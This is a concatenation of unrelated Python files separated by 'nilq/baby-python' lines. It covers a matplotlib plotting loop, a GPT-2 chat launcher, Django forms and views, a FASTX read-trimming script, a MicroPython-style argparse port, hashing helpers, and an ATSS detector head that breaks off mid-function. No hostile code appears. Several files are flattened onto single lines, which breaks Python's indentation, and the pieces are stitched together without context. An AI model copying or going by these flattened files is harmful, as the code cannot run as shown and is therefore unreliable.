    prom = prom + 1
    line, = ax.plot(out_b, y_volts)
    ann = ax.annotate(text, xy=(xtext, ytext), xycoords='data',
                      xytext=(8, 0), textcoords='offset points',
                      size=30, va="center",
                      bbox=dict(boxstyle="round", fc=(color), ec="none"),
                      arrowprops=dict(arrowstyle="wedge,tail_width=1.",
                                      fc=(color), ec="none",
                                      patchA=None,
                                      patchB=el,
                                      relpos=(0.2, 0.5)))
    #ax.text(right, top, 'right bottom',
    #        horizontalalignment='right',
    #        verticalalignment='bottom',
    #        transform=ax.transAxes)
    # Brief pause so the frame is visible, then clear for the next one.
    plt.pause(0.2)
    plt.cla()
    print("ok")

plt.show()
nilq/baby-python
python
#!/usr/bin/env python import argparse parser = argparse.ArgumentParser(description='Gossip Chat via GPT2') parser.add_argument('-m', '--model', dest="model", help="pretrained model path") parser.add_argument('-c', '--config', dest="config", help="model config path") parser.add_argument('-p', '--port', dest='port', default=5000, help="listen port, default is 5000") parser.add_argument('--device', dest="device", default="cuda:0", help="choose to use cpu or cuda:x, default is cuda:0") parser.add_argument('--backend', dest='backend', default='shell', help="choose for backend from: shell, restful, default is shell") args = parser.parse_args() from gossipbot.backend import Backend s = Backend(backend_type=args.backend, model_path=args.model, config_path=args.config, device=args.device, port=args.port) s.run()
nilq/baby-python
python
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django import forms
from .models import Employee
from django.forms import ModelForm, fields
from .models import Order
from .models import Customer
from .models import Tag
from .models import Product


class TagForm(ModelForm):
    """Model form exposing every field of Tag.

    BUG FIX: this class was previously also named ``ProductForm`` and was
    immediately shadowed by the Product form below, making it unreachable.
    Renaming it ``TagForm`` makes it usable; ``ProductForm`` is unchanged.
    """
    class Meta:
        model = Tag
        fields = '__all__'


class ProductForm(ModelForm):
    """Model form exposing every field of Product."""
    class Meta:
        model = Product
        fields = '__all__'


class OrderForm(ModelForm):
    """Model form exposing every field of Order."""
    class Meta:
        model = Order
        fields = '__all__'


class CustomerForm(forms.ModelForm):
    """Customer form; only the name is mandatory."""
    class Meta:
        model = Customer
        fields = ('name', 'phone', 'email')

    def __init__(self, *args, **kwargs):
        super(CustomerForm, self).__init__(*args, **kwargs)
        # Contact details are optional for a customer record.
        self.fields['email'].required = False
        self.fields['phone'].required = False


class EmployeeForm(forms.ModelForm):
    """Employee form with human-friendly labels and 'Select' placeholders."""
    class Meta:
        model = Employee
        fields = ('fullname', 'age', 'gender', 'email', 'mobile', 'emp_code',
                  'position')
        labels = {
            'fullname': 'Full Name',
            'age': 'Age',
            'gender': 'Gender',
            'email': 'Email',
            'mobile': 'Mobile Number',
            'emp_code': 'Employee Code',
            'position': 'Position',
        }

    def __init__(self, *args, **kwargs):
        super(EmployeeForm, self).__init__(*args, **kwargs)
        # Show 'Select' instead of Django's default '---------' placeholder.
        self.fields['gender'].empty_label = "Select"
        self.fields['position'].empty_label = "Select"
        self.fields['emp_code'].required = True


class CreateUserForm(UserCreationForm):
    """Sign-up form built on Django's UserCreationForm."""
    class Meta:
        model = User
        fields = ['username', 'email', 'password1', 'password2']
nilq/baby-python
python
from django.http import HttpResponse
from django.shortcuts import reverse
from django.views import View


class HeavenTestAPIView(View):
    """Render an HTML index of the example endpoints as clickable links."""

    def get(self, request):
        def as_anchor(name):
            # Resolve the URL name and wrap it in an <a> tag.
            return "<a href='{reversed_link}'>{link}</a>".format(
                reversed_link=reverse(name), link=name)

        anchors = [as_anchor(name) for name in (
            'example_http',
            'example_json',
            'example_json_proxy',
            'example_redirect',
        )]
        # The REST examples only resolve when the optional REST app is
        # installed; skip them silently otherwise.
        try:
            rest_anchors = [as_anchor(name)
                            for name in ('example_rest', 'example_rest_proxy')]
        except Exception:
            pass
        else:
            anchors += rest_anchors
        return HttpResponse("<br>".join(anchors))
nilq/baby-python
python
""" @author: Gabriele Girelli @contact: gigi.ga90@gmail.com """ import argparse from fastx_barber import scriptio from fastx_barber.const import PATTERN_EXAMPLE, FlagData from fastx_barber.exception import enable_rich_assert from fastx_barber.flag import ( FastqFlagExtractor, FlagStats, get_fastx_flag_extractor, ) from fastx_barber.io import ChunkMerger from fastx_barber.match import AlphaNumericPattern, FastxMatcher from fastx_barber.qual import setup_qual_filters from fastx_barber.scriptio import get_handles, get_split_handles from fastx_barber.scripts import arguments as ap from fastx_barber.seqio import ( get_fastx_format, SimpleFastxRecord, SimpleFastxWriter, SimpleSplitFastxWriter, ) from fastx_barber.trim import get_fastx_trimmer import joblib # type: ignore import logging import regex as re # type: ignore from rich.logging import RichHandler # type: ignore import sys from typing import Dict, List, Tuple, Union logging.basicConfig( level=logging.INFO, format="%(message)s", handlers=[RichHandler(markup=True, rich_tracebacks=True)], ) def init_parser(subparsers: argparse._SubParsersAction) -> argparse.ArgumentParser: parser = subparsers.add_parser( "extract", description="Extract flags and trim the records of a FASTX file.", formatter_class=argparse.RawDescriptionHelpFormatter, help="Extract flags and trim the records of a FASTX file.", ) parser.add_argument( "input", type=str, metavar="in.fastx[.gz]", help="""Path to the fasta/q file to trim.""", ) parser.add_argument( "output", type=str, metavar="out.fastx[.gz]", help="Path to fasta/q file where to write trimmed records. " + "Format will match the input.", ) parser.add_argument( "--pattern", type=str, help="Pattern to match to reads and extract flagged groups. " + f"Remember to use quotes. 
Example: '{PATTERN_EXAMPLE}'", ) parser = ap.add_version_option(parser) advanced = parser.add_argument_group("advanced arguments") advanced = ap.add_unmatched_output_option(advanced) advanced = ap.add_flag_delim_option(advanced) advanced.add_argument( "--selected-flags", type=str, nargs="+", help="Space-separated names of flags to be extracted. " + "By default it extracts all flags.", ) advanced = ap.add_flagstats_option(advanced) advanced = ap.add_split_by_option(advanced) advanced = ap.add_filter_qual_flags_option(advanced) advanced = ap.add_filter_qual_output_option(advanced) advanced = ap.add_phred_offset_option(advanced) advanced.add_argument( "--no-qual-flags", action="store_const", dest="qual_flags", const=False, default=True, help="Do not extract quality flags (when running on a fastq file).", ) advanced.add_argument( "--simple-pattern", action="store_const", dest="simple_pattern", const=True, default=False, help="Parse pattern as 'simple' (alphanumeric) pattern.", ) advanced = ap.add_comment_space_option(advanced) advanced = ap.add_compress_level_option(advanced) advanced = ap.add_log_file_option(advanced) advanced = ap.add_chunk_size_option(advanced) advanced = ap.add_threads_option(advanced) advanced = ap.add_tempdir_option(advanced) parser.set_defaults(parse=parse_arguments, run=run) return parser @enable_rich_assert def parse_arguments(args: argparse.Namespace) -> argparse.Namespace: assert 1 == len(args.flag_delim) args.threads = ap.check_threads(args.threads) args = scriptio.set_tempdir(args) if args.pattern is None: logging.info( "No pattern specified (--pattern), nothing to do. 
:person_shrugging:" ) sys.exit() args.pattern = ( AlphaNumericPattern(args.pattern) if args.simple_pattern else re.compile(args.pattern) ) if args.log_file is not None: scriptio.add_log_file_handler(args.log_file) ap.log_args(args) logging.info("[bold underline red]Flag extraction[/]") if args.selected_flags is not None: logging.info(f"Selected flags\t{args.selected_flags}") logging.info(f"Flag stats\t{args.flagstats}") logging.info(f"Flag delim\t'{args.flag_delim}'") logging.info(f"Comment delim\t'{args.comment_space}'") logging.info(f"Quality flags\t{args.qual_flags}") if args.split_by is not None: logging.info(f"Split by\t'{args.split_by}'") return args ChunkDetails = Tuple[int, int, int, FlagStats] def run_chunk( chunk: List[SimpleFastxRecord], cid: int, args: argparse.Namespace, ) -> ChunkDetails: fmt, _ = get_fastx_format(args.input) OHC: Union[SimpleFastxWriter, SimpleSplitFastxWriter, None] FHC: Union[SimpleFastxWriter, SimpleSplitFastxWriter, None] OHC, UHC, FHC, filter_output_fun = ( get_handles(fmt, cid, args) if args.split_by is None else get_split_handles(fmt, cid, args) ) foutput = scriptio.get_output_fun(OHC, UHC) matcher = FastxMatcher(args.pattern) trimmer = get_fastx_trimmer(fmt) quality_flag_filters, filter_fun = setup_qual_filters( args.filter_qual_flags, args.phred_offset ) flag_extractor = get_fastx_flag_extractor(fmt)(args.selected_flags, args.flagstats) flag_extractor.flag_delim = args.flag_delim flag_extractor.comment_space = args.comment_space if isinstance(flag_extractor, FastqFlagExtractor): flag_extractor.extract_qual_flags = args.qual_flags filtered_counter = 0 for record in chunk: flags: Dict[str, FlagData] = {} match, matched = matcher.do(record) if matched: flags = flag_extractor.extract_all(record, match) flag_extractor.update_stats(flags) flags_selected = flag_extractor.apply_selection(flags) record = flag_extractor.update(record, flags_selected) record = trimmer.trim_re(record, match) pass_filters = filter_fun(flags, 
quality_flag_filters) if not pass_filters: filtered_counter += 1 filter_output_fun(record, flags) continue foutput[matched](record, flags) SimpleFastxWriter.close_handle(OHC) SimpleFastxWriter.close_handle(UHC) SimpleFastxWriter.close_handle(FHC) return ( filtered_counter, matcher.matched_count, len(chunk), flag_extractor.flagstats, ) def merge_chunk_details(chunk_details: List[ChunkDetails]) -> ChunkDetails: parsed_counter = 0 matched_counter = 0 filtered_counter = 0 flagstats: FlagStats = FlagStats() for filtered, matched, parsed, stats in chunk_details: filtered_counter += filtered matched_counter += matched parsed_counter += parsed for flag_name, data in stats.items(): for k, v in data.items(): flagstats[flag_name][k] += v return (parsed_counter, matched_counter, filtered_counter, flagstats) @enable_rich_assert def run(args: argparse.Namespace) -> None: fmt, IH = scriptio.get_input_handler(args.input, args.chunk_size) quality_flag_filters, filter_fun = setup_qual_filters( args.filter_qual_flags, args.phred_offset, verbose=True ) logging.info("[bold underline red]Running[/]") logging.info("Trimming and extracting flags...") chunk_details = joblib.Parallel(n_jobs=args.threads, verbose=10)( joblib.delayed(run_chunk)(chunk, cid, args) for chunk, cid in IH ) logging.info("Merging subprocesses details...") n_parsed, n_matched, n_filtered, flagstats = merge_chunk_details(chunk_details) logging.info( f"{n_matched}/{n_parsed} ({n_matched/n_parsed*100:.2f}%) " + "records matched the pattern.", ) if args.filter_qual_flags is not None and 0 != n_matched: logging.info( " ".join( ( f"{(n_matched-n_filtered)}/{n_matched}", f"({(n_matched-n_filtered)/n_matched*100:.2f}%)", "records passed the quality filters.", ) ) ) if args.flagstats is not None: flagstats.export(args.output) logging.info("Merging batch output...") if args.unmatched_output is not None: merger = ChunkMerger(args.temp_dir, None) merger.do(args.unmatched_output, IH.last_chunk_id, "Writing unmatched records") 
merger = ChunkMerger(args.temp_dir, args.split_by) merger.do(args.output, IH.last_chunk_id, "Writing matched records") if args.filter_qual_output is not None: merger.do(args.filter_qual_output, IH.last_chunk_id, "Writing filtered records") logging.info("Done. :thumbs_up: :smiley:")
nilq/baby-python
python
""" Minimal and functional version of CPython's argparse module. """ import sys try: from ucollections import namedtuple except ImportError: from collections import namedtuple class _ArgError(BaseException): pass class _Arg: def __init__(self, names, dest, metavar, arg_type, action, nargs, const, default, required, choices, help): self.names = names self.dest = dest self.metavar = metavar self.arg_type = arg_type self.action = action self.nargs = nargs self.const = const self.default = default self.required = required self.choices = choices self.help = help def parse(self, optname, args): # parse args for this Arg def _checked(_arg): if self.choices and _arg not in self.choices: raise _ArgError("value %s must be one of this '%s'" % (_arg, ', '.join(map(str, self.choices)))) try: return self.arg_type(_arg) except (TypeError, ValueError, OSError): try: raise _ArgError('invalid %s value: %s' % (self.arg_type.__name__, _arg)) except AttributeError: raise _ArgError('value %s is not applicable for type of key %s' % (_arg, optname)) if self.action == "store" or self.action == "append": if self.nargs is None: if args: return _checked(args.pop(0)) else: raise _ArgError("expecting value for %s" % optname) elif self.nargs == "?": if args: return _checked(args.pop(0)) else: return self.default else: if self.nargs == "*": n = -1 elif self.nargs == "+": if not args: raise _ArgError("expecting value for %s" % optname) n = -1 else: n = int(self.nargs) ret = [] stop_at_opt = True while args and n != 0: if stop_at_opt and args[0].startswith("-") and args[0] != "-": if args[0] == "--": stop_at_opt = False args.pop(0) else: break else: ret.append(_checked(args.pop(0))) n -= 1 if n > 0: raise _ArgError("expecting value for %s" % optname) return ret elif self.action == "store_const": return self.const elif self.action == "append": if args: return _checked(args.pop(0)) else: raise _ArgError("expecting value for %s" % optname) else: assert False class FileType: def __init__(self, 
mode='r', bufsize=-1, encoding=None, errors=None): self._mode = mode self._bufsize = bufsize self._encoding = encoding self._errors = errors def __call__(self, string): # the special argument "-" means sys.std{in,out} if string == '-': if 'r' in self._mode: return sys.stdin elif 'w' in self._mode: return sys.stdout else: msg = 'argument "-" with mode %r' % self._mode raise _ArgError(msg) # all other arguments are used as file names try: # return open(string, self._mode, self._bufsize, self._encoding,self._errors) # incompatible with micropython return open(string, self._mode) except OSError as e: message = "can't open '%s': %s" raise _ArgError(message % (string, e)) def __repr__(self): args = self._mode, self._bufsize kwargs = [('encoding', self._encoding), ('errors', self._errors)] args_str = ', '.join([repr(arg) for arg in args if arg != -1] + ['%s=%r' % (kw, arg) for kw, arg in kwargs if arg is not None]) return '%s(%s)' % (type(self).__name__, args_str) def _dest_from_optnames(opt_names): dest = opt_names[0] for name in opt_names: if name.startswith("--"): dest = name break return dest.lstrip("-").replace("-", "_") class ArgumentParser: def __init__(self, *, prog=None, description="", epilog=""): self.prog = sys.argv[0] if (sys.argv and not prog) else prog self.description = description self.epilog = epilog self.opt = [] self.pos = [] def add_argument(self, *args, **kwargs): action = kwargs.get("action", "store") if action == "store_true": action = "store_const" const = True default = kwargs.get("default", False) elif action == "store_false": action = "store_const" const = False default = kwargs.get("default", True) else: const = kwargs.get("const", None) default = kwargs.get("default", None) if args and args[0].startswith("-"): list = self.opt dest = kwargs.get("dest") if dest is None: dest = _dest_from_optnames(args) else: list = self.pos dest = kwargs.get("dest") if dest is None: dest = args[0] if not args: args = [dest] arg_type = kwargs.get("type", str) 
nargs = kwargs.get("nargs", None) metavar = kwargs.get("metavar", None) required = kwargs.get("required", False) choices = kwargs.get("choices", None) help = kwargs.get("help", "") list.append( _Arg(args, dest, metavar, arg_type, action, nargs, const, default, required, choices, help)) def usage(self, full): # print short usage print("usage: %s [-h, --help]" % self.prog, end="") def render_arg(arg): if arg.action in ["store", "append"]: if arg.metavar: arg_for_render = "%s" % arg.metavar.upper() elif arg.choices: arg_for_render = "[%s]" % ", ".join(arg.choices) else: arg_for_render = arg.dest.upper() if arg.nargs is None: return " %s" % arg_for_render if isinstance(arg.nargs, int): return " %s(x%d)" % (arg_for_render, arg.nargs) else: return " [%s...]" % arg_for_render else: return "" for opt in self.opt: print(" [%s%s]" % (', '.join(opt.names), render_arg(opt)), end="") for pos in self.pos: print(render_arg(pos), end="") print() if not full: return # print full information print() if self.description: print(self.description) if self.pos: print("\nPositional arguments:") for pos in self.pos: print(" %-20s%s" % (pos.names[0], pos.help)) print("\nNamed arguments:") print(" -h, --help show this message and exit") for opt in self.opt: # Dont show help with possible values for opt. It's stays in "usage" anyway. 
# print(" %-20s%s " % (', '.join(opt.names) + render_arg(opt).upper(), opt.help)) print(" %-20s%s" % (', '.join(opt.names), opt.help)) print("\n", self.epilog) def parse_args(self, args=None): return self._parse_args_impl(args, False) def parse_known_args(self, args=None): return self._parse_args_impl(args, True) def _parse_args_impl(self, args, return_unknown): if args is None: args = sys.argv[1:] else: args = args[:] try: return self._parse_args(args, return_unknown) except _ArgError as e: self.usage(False) print("error:", e) sys.exit(2) def _parse_args(self, args, return_unknown): # add optional(named) args with defaults arg_dest = [] arg_vals = [] for opt in self.opt: arg_dest.append(opt.dest) arg_vals.append(opt.default) # deal with unknown arguments, if needed unknown = [] def consume_unknown(): while args and not args[0].startswith("-"): unknown.append(args.pop(0)) # parse all args parsed_pos = False while args or not parsed_pos: if args and args[0].startswith("-") and args[0] != "-" and args[0] != "--": # optional(named) arguments a = args.pop(0) if a in ("-h", "--help"): self.usage(True) sys.exit(0) found = False for i, opt in enumerate(self.opt): if a in opt.names: if opt.action == "append": if type(arg_vals[i]) is type(None): arg_vals[i] = [] arg_vals[i].append(opt.parse(a, args)) found = True else: arg_vals[i] = opt.parse(a, args) found = True break if not found: if return_unknown: unknown.append(a) consume_unknown() else: raise _ArgError("unknown option %s" % a) else: # positional arguments if parsed_pos: if return_unknown: unknown = unknown + args break else: raise _ArgError("extra args: %s" % " ".join(args)) for pos in self.pos: arg_dest.append(pos.dest) arg_vals.append(pos.parse(pos.names[0], args)) parsed_pos = True if return_unknown: consume_unknown() # checks the required arguments required_but_not_used = ([arg.dest for i, arg in enumerate(self.opt) if arg.required == True and arg_vals[i] == None]) if required_but_not_used: raise 
_ArgError("option(s) '%s' is(are) required" % ", ".join(required_but_not_used)) values = namedtuple("args", arg_dest)(*arg_vals) return (values, unknown) if return_unknown else values
nilq/baby-python
python
import json
from hashlib import sha256
from typing import List

from ..configs import BaseLayerConfig


def create_dir_name_from_config(config: BaseLayerConfig, prefix: str = "") -> str:
    """Build a deterministic directory name for a layer config.

    The name is the SHA-256 hex digest of the config's class name
    concatenated with its (cache-free) JSON representation.
    """
    payload = config.__class__.__name__ + json.dumps(config.to_dict_without_cache())
    return prefix + sha256(payload.encode()).hexdigest()


def create_file_name_from_path(path: str, ext: str, prefix: str = "") -> str:
    """Build a deterministic file name (with extension) for a single path."""
    digest = sha256(path.encode()).hexdigest()
    return "{}{}.{}".format(prefix, digest, ext)


def create_file_name_from_paths(paths: List[str], ext: str, prefix: str = "") -> str:
    """Build a deterministic file name for a set of paths (order-independent)."""
    canonical = json.dumps(sorted(paths))
    digest = sha256(canonical.encode()).hexdigest()
    return "{}{}.{}".format(prefix, digest, ext)
nilq/baby-python
python
#!/usr/bin/env python3
# @Time    : 27/6/29 2:46 PM
# @Author  : fangcheng.ji
# @FileName: qfl_atss.py
#
# ATSS (Adaptive Training Sample Selection) proposal generator with a
# quality-focal-loss head, implemented on top of detectron2.

import math
import torch
import torch.nn.functional as F
from torch import nn
import os
from typing import Dict, List

from .fcos import Scale
from detectron2.modeling.proposal_generator.build import PROPOSAL_GENERATOR_REGISTRY
from detectron2.layers import ShapeSpec, cat, ml_nms, quality_focal_loss
from detectron2.layers import DFConv2d, get_norm
from detectron2.structures import Instances, Boxes, pairwise_iou, matched_boxlist_iou
from detectron2.utils.comm import get_world_size, reduce_sum
from fvcore.nn import sigmoid_focal_loss_jit

from ..anchor_generator import build_anchor_generator
from ..matcher import Matcher

# Sentinel used as "infinitely far / invalid" in the assignment matrices.
INF = 100000000


@PROPOSAL_GENERATOR_REGISTRY.register()
class QFLATSS(torch.nn.Module):
    """Top-level ATSS proposal generator: head + target assignment + NMS."""

    def __init__(self, cfg, input_shape: Dict[str, ShapeSpec]):
        super(QFLATSS, self).__init__()
        self.cfg = cfg

        self.in_features = cfg.MODEL.ATSS.IN_FEATURES
        feature_shapes = [input_shape[f] for f in self.in_features]
        in_channels = [f.channels for f in feature_shapes]
        assert len(set(in_channels)) == 1, "Each level must have the same channel!"
        in_channels = in_channels[0]

        self.fcos_head = ATSSHead(cfg, in_channels)

        box_coder = BoxCoder(cfg)
        self.loss_evaluator = ATSSLossComputation(cfg, box_coder)

        # for inference
        self.box_selector_test = ATSSPostProcessor(
            pre_nms_thresh=cfg.MODEL.ATSS.INFERENCE_TH,
            pre_nms_top_n=cfg.MODEL.ATSS.PRE_NMS_TOP_N,
            nms_thresh=cfg.MODEL.ATSS.NMS_TH,
            fpn_post_nms_top_n=cfg.MODEL.ATSS.POST_NMS_TOPK_TEST,
            min_size=0,
            num_classes=cfg.MODEL.ATSS.NUM_CLASSES + 1,   # add background
            bbox_aug_enabled=cfg.TEST.AUG.ENABLED,
            box_coder=box_coder,
        )

        # self.anchor_generator = make_anchor_generator_atss(cfg)
        self.anchor_generator = build_anchor_generator(cfg, feature_shapes)

    def forward(self, images, features, gt_instances):
        """Run the head on the selected FPN levels; train or test branch."""
        features = [features[f] for f in self.in_features]
        box_cls, box_regression = self.fcos_head(features)
        anchors = self.anchor_generator(features)

        if self.training:
            return self._forward_train(box_cls, box_regression, gt_instances, anchors)
        else:
            return self._forward_test(images.image_sizes, box_cls, box_regression, anchors)

    def _forward_train(self, box_cls, box_regression, gt_instances, anchors):
        # Training: only losses are produced, no proposals.
        loss_box_cls, loss_box_reg = self.loss_evaluator(
            box_cls, box_regression, gt_instances, anchors
        )
        losses = {
            "loss_cls": loss_box_cls,
            "loss_reg": loss_box_reg,
        }
        return None, losses

    def _forward_test(self, image_sizes, box_cls, box_regression, anchors):
        # Inference: decode + NMS via the post-processor, no losses.
        boxes = self.box_selector_test(image_sizes, box_cls, box_regression, anchors)
        return boxes, {}


class ATSSHead(torch.nn.Module):
    """Shared conv towers producing per-anchor classification and box deltas."""

    def __init__(self, cfg, in_channels):
        super(ATSSHead, self).__init__()
        self.cfg = cfg
        num_classes = cfg.MODEL.ATSS.NUM_CLASSES
        # Anchors per location = |aspect ratios| * |sizes| of the first level.
        num_anchors = len(cfg.MODEL.ANCHOR_GENERATOR.ASPECT_RATIOS[0]) * len(cfg.MODEL.ANCHOR_GENERATOR.SIZES[0])

        # tower name -> (depth, use deformable convs)
        head_configs = {"cls": (cfg.MODEL.ATSS.NUM_CONVS, False),
                        "bbox": (cfg.MODEL.ATSS.NUM_CONVS, cfg.MODEL.ATSS.USE_DCN_IN_TOWER),
                        }
        norm = None if cfg.MODEL.ATSS.NORM == "none" else cfg.MODEL.ATSS.NORM

        for head in head_configs:
            tower = []
            num_convs, use_deformable = head_configs[head]
            if use_deformable:
                conv_func = DFConv2d
            else:
                conv_func = nn.Conv2d
            for i in range(num_convs):
                tower.append(conv_func(
                    in_channels, in_channels,
                    kernel_size=3, stride=1,
                    padding=1, bias=True
                ))
                if norm == "GN":
                    tower.append(nn.GroupNorm(32, in_channels))
                elif norm is not None:
                    tower.append(get_norm(norm, in_channels))
                tower.append(nn.ReLU())
            self.add_module('{}_tower'.format(head), nn.Sequential(*tower))

        self.cls_logits = nn.Conv2d(
            in_channels, num_anchors * num_classes, kernel_size=3, stride=1, padding=1
        )
        self.bbox_pred = nn.Conv2d(
            in_channels, num_anchors * 4, kernel_size=3, stride=1, padding=1
        )

        # initialization
        for modules in [self.cls_tower, self.bbox_tower,
                        self.cls_logits, self.bbox_pred,
                        ]:
            for l in modules.modules():
                if isinstance(l, nn.Conv2d):
                    torch.nn.init.normal_(l.weight, std=0.01)
                    torch.nn.init.constant_(l.bias, 0)

        # initialize the bias for focal loss (so initial foreground
        # probability is ~PRIOR_PROB, standard focal-loss init)
        prior_prob = cfg.MODEL.ATSS.PRIOR_PROB
        bias_value = -math.log((1 - prior_prob) / prior_prob)
        torch.nn.init.constant_(self.cls_logits.bias, bias_value)

        if self.cfg.MODEL.ATSS.REGRESSION_TYPE == 'POINT':
            assert num_anchors == 1, "regressing from a point only support num_anchors == 1"
            torch.nn.init.constant_(self.bbox_pred.bias, 4)

        # One learnable scale per FPN level for the regression output.
        self.scales = nn.ModuleList([Scale(init_value=1.0) for _ in range(5)])

    def forward(self, x):
        """Return per-level (classification logits, box regression) lists."""
        logits = []
        bbox_reg = []
        for l, feature in enumerate(x):
            cls_tower = self.cls_tower(feature)
            box_tower = self.bbox_tower(feature)

            logits.append(self.cls_logits(cls_tower))

            bbox_pred = self.scales[l](self.bbox_pred(box_tower))
            if self.cfg.MODEL.ATSS.REGRESSION_TYPE == 'POINT':
                # Point regression predicts distances, which must be >= 0.
                bbox_pred = F.relu(bbox_pred)
            bbox_reg.append(bbox_pred)

        return logits, bbox_reg


class ATSSLossComputation(object):
    """Target assignment (SSC / ATSS / TOPK / IoU) and loss computation."""

    def __init__(self, cfg, box_coder):
        self.cfg = cfg
        self.focal_loss_alpha = cfg.MODEL.ATSS.LOSS_ALPHA
        self.focal_loss_gamma = cfg.MODEL.ATSS.LOSS_GAMMA
        self.num_classes = cfg.MODEL.ATSS.NUM_CLASSES

        self.matcher = Matcher(
            cfg.MODEL.ATSS.IOU_THRESHOLDS,
            cfg.MODEL.ATSS.IOU_LABELS,
            allow_low_quality_matches=True
        )

        self.box_coder = box_coder

    def GIoULoss(self, pred, target, anchor, weight=None):
        """Generalized-IoU loss between decoded predictions and targets.

        pred/target are box-coder deltas relative to `anchor`; both are
        decoded to absolute boxes before computing GIoU. Returns the
        (optionally weighted) sum of per-box losses.
        """
        pred_boxes = self.box_coder.decode(pred.view(-1, 4), anchor.view(-1, 4))
        pred_x1 = pred_boxes[:, 0]
        pred_y1 = pred_boxes[:, 1]
        pred_x2 = pred_boxes[:, 2]
        pred_y2 = pred_boxes[:, 3]
        # Guard against degenerate (inverted) predicted boxes.
        pred_x2 = torch.max(pred_x1, pred_x2)
        pred_y2 = torch.max(pred_y1, pred_y2)
        pred_area = (pred_x2 - pred_x1) * (pred_y2 - pred_y1)

        gt_boxes = self.box_coder.decode(target.view(-1, 4), anchor.view(-1, 4))
        target_x1 = gt_boxes[:, 0]
        target_y1 = gt_boxes[:, 1]
        target_x2 = gt_boxes[:, 2]
        target_y2 = gt_boxes[:, 3]
        target_area = (target_x2 - target_x1) * (target_y2 - target_y1)

        x1_intersect = torch.max(pred_x1, target_x1)
        y1_intersect = torch.max(pred_y1, target_y1)
        x2_intersect = torch.min(pred_x2, target_x2)
        y2_intersect = torch.min(pred_y2, target_y2)
        area_intersect = torch.zeros(pred_x1.size()).to(pred)
        mask = (y2_intersect > y1_intersect) * (x2_intersect > x1_intersect)
        area_intersect[mask] = (x2_intersect[mask] - x1_intersect[mask]) * (y2_intersect[mask] - y1_intersect[mask])

        x1_enclosing = torch.min(pred_x1, target_x1)
        y1_enclosing = torch.min(pred_y1, target_y1)
        x2_enclosing = torch.max(pred_x2, target_x2)
        y2_enclosing = torch.max(pred_y2, target_y2)
        area_enclosing = (x2_enclosing - x1_enclosing) * (y2_enclosing - y1_enclosing) + 1e-7

        area_union = pred_area + target_area - area_intersect + 1e-7
        ious = area_intersect / area_union
        gious = ious - (area_enclosing - area_union) / area_enclosing

        losses = 1 - gious

        if weight is not None and weight.sum() > 0:
            return (losses * weight).sum()
        else:
            assert losses.numel() != 0
            return losses.sum()

    def DIoULoss(self, pred, target, anchor, weight=None):
        """Distance-IoU loss: IoU penalized by normalized center distance.

        Same calling convention as GIoULoss.
        """
        pred_boxes = self.box_coder.decode(pred.view(-1, 4), anchor.view(-1, 4))
        pred_x1 = pred_boxes[:, 0]
        pred_y1 = pred_boxes[:, 1]
        pred_x2 = pred_boxes[:, 2]
        pred_y2 = pred_boxes[:, 3]
        pred_x2 = torch.max(pred_x1, pred_x2)
        pred_y2 = torch.max(pred_y1, pred_y2)
        pred_area = (pred_x2 - pred_x1) * (pred_y2 - pred_y1)
        pred_cx = (pred_x2 + pred_x1) / 2.0
        pred_cy = (pred_y2 + pred_y1) / 2.0

        gt_boxes = self.box_coder.decode(target.view(-1, 4), anchor.view(-1, 4))
        target_x1 = gt_boxes[:, 0]
        target_y1 = gt_boxes[:, 1]
        target_x2 = gt_boxes[:, 2]
        target_y2 = gt_boxes[:, 3]
        target_area = (target_x2 - target_x1) * (target_y2 - target_y1)
        target_cx = (target_x2 + target_x1) / 2.0
        target_cy = (target_y2 + target_y1) / 2.0

        x1_intersect = torch.max(pred_x1, target_x1)
        y1_intersect = torch.max(pred_y1, target_y1)
        x2_intersect = torch.min(pred_x2, target_x2)
        y2_intersect = torch.min(pred_y2, target_y2)
        area_intersect = torch.zeros(pred_x1.size()).to(pred)
        mask = (y2_intersect > y1_intersect) * (x2_intersect > x1_intersect)
        area_intersect[mask] = (x2_intersect[mask] - x1_intersect[mask]) * (y2_intersect[mask] - y1_intersect[mask])

        x1_enclosing = torch.min(pred_x1, target_x1)
        y1_enclosing = torch.min(pred_y1, target_y1)
        x2_enclosing = torch.max(pred_x2, target_x2)
        y2_enclosing = torch.max(pred_y2, target_y2)
        # c: squared diagonal of the smallest enclosing box;
        # d: squared distance between box centers.
        c_squared = torch.pow(y2_enclosing - y1_enclosing, 2) + torch.pow(x2_enclosing - x1_enclosing, 2) + 1e-7
        d_squared = torch.pow(target_cy - pred_cy, 2) + torch.pow(target_cx - pred_cx, 2)

        area_union = pred_area + target_area - area_intersect + 1e-7
        ious = area_intersect / area_union
        dious = ious - d_squared / c_squared

        losses = 1 - dious

        if weight is not None and weight.sum() > 0:
            return (losses * weight).sum()
        else:
            assert losses.numel() != 0
            return losses.sum()

    def prepare_targets(self, gt_instances, anchors):
        """Assign per-anchor classification labels and regression targets.

        Supports four positive-sample selection strategies, chosen by
        cfg.MODEL.ATSS.POSITIVE_TYPE: 'SSC', 'ATSS', 'TOPK' and 'IoU'.
        Returns (cls_labels, reg_targets), one entry per image; background
        anchors get label == self.num_classes.
        """
        cls_labels = []
        reg_targets = []

        anchors_all_level = Boxes.cat(anchors)
        for im_i in range(len(gt_instances)):
            targets_per_im = gt_instances[im_i]
            bboxes_per_im = targets_per_im.gt_boxes
            labels_per_im = targets_per_im.gt_classes
            num_gt = len(bboxes_per_im)

            if num_gt > 0:
                if self.cfg.MODEL.ATSS.POSITIVE_TYPE == 'SSC':
                    # FCOS-style size-of-interest assignment per FPN level.
                    # NOTE(review): this branch indexes `anchors[im_i]` and
                    # `bboxes_per_im[:, 0]` with a boxlist-style API that does
                    # not match the detectron2 types used elsewhere in this
                    # file — verify before enabling POSITIVE_TYPE == 'SSC'.
                    object_sizes_of_interest = [[-1, 64], [64, 128], [128, 256], [256, 512], [512, INF]]
                    area_per_im = targets_per_im.area()
                    expanded_object_sizes_of_interest = []
                    points = []
                    for l, anchors_per_level in enumerate(anchors[im_i]):
                        anchors_per_level = anchors_per_level.bbox
                        anchors_cx_per_level = (anchors_per_level[:, 2] + anchors_per_level[:, 0]) / 2.0
                        anchors_cy_per_level = (anchors_per_level[:, 3] + anchors_per_level[:, 1]) / 2.0
                        points_per_level = torch.stack((anchors_cx_per_level, anchors_cy_per_level), dim=1)
                        points.append(points_per_level)
                        object_sizes_of_interest_per_level = \
                            points_per_level.new_tensor(object_sizes_of_interest[l])
                        expanded_object_sizes_of_interest.append(
                            object_sizes_of_interest_per_level[None].expand(len(points_per_level), -1)
                        )
